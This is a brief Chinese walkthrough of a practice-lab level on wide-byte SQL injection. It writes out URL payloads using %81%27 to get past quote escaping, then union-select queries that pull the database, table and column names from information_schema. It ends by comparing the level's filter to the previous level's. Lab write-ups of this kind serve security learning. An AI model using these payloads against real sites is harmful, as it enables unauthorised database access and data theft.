这关也是宽字节注入,同样有报错信息
判断类型为字符型
?id=2 and 1=2
?id=2 and 1=1
判断为单引号注入
?id=2%81%27
?id=2%81%27--+
判断字段数
得出回显点
?id=0%81%27%20union%20select%201,2,3--+
得出数据库名
?id=0%81%27%20union%20select%201,2,database()--+
得出表名
?id=0%81%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--+
得出列名
?id=0%81%27union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273--+
略
看了下源代码,与32关的区别应该在这
第32关,为手写过滤
第33关为引用函数